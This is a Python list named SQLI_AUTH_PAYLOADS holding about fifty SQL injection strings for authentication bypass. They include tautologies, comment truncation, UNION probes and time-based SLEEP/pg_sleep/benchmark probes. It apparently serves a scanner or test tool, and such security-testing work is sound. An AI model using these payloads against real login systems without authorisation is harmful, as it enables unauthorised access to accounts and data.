SQLI_AUTH_PAYLOADS = [
    "' OR '1'='1",
    "' OR '1'='1' --",
    "' OR '1'='1' #",
    "' OR 1=1 --",
    "' OR 1=1 #",
    "\" OR \"1\"=\"1",
    "\" OR \"1\"=\"1\" --",
    "admin' --",
    "admin' #",
    "' OR 'a'='a",
    "') OR ('1'='1",
    "' OR 1=1/*",
    "' OR 'x'='x",
    "' OR 1=1 LIMIT 1 --",
    "' OR TRUE --",
    "\" OR TRUE --",
    "' OR '1'='1'/*",
    "') OR 1=1 --",
    "' OR 1=1; --",
    "test' OR '1'='1",
    "admin' OR '1'='1",
    "admin') OR ('1'='1",
    "' UNION SELECT NULL --",
    "' AND '1'='1",
    "' AND '1'='2",
    "\" AND \"1\"=\"1",
    "\" AND \"1\"=\"2",
    "' OR SLEEP(1) --",
    "\" OR SLEEP(1) --",
    "' OR pg_sleep(1) --",
    "' OR benchmark(1000000,md5(1)) --",
    "' OR '1' LIKE '1",
    "' OR 1 LIKE 1 --",
    "') OR ('a'='a",
    "')) OR (('1'='1",
    "' OR EXISTS(SELECT 1) --",
    "' OR NOT 1=2 --",
    "' OR 2>1 --",
    "' OR 1 IN (1) --",
    "' OR ''='",
    "\" OR \"\"=\"",
    "' OR ' '=' '",
    "' OR '1'='1' OR ''='",
    "' OR 1=1 AND ''='",
    "' OR 1=1 ORDER BY 1 --",
    "' OR 1=1 GROUP BY 1 --",
    "' OR 1=1 HAVING 1=1 --",
    "' OR 'admin'='admin",
    "' OR username LIKE '%' --",
    "' OR email LIKE '%' --",
]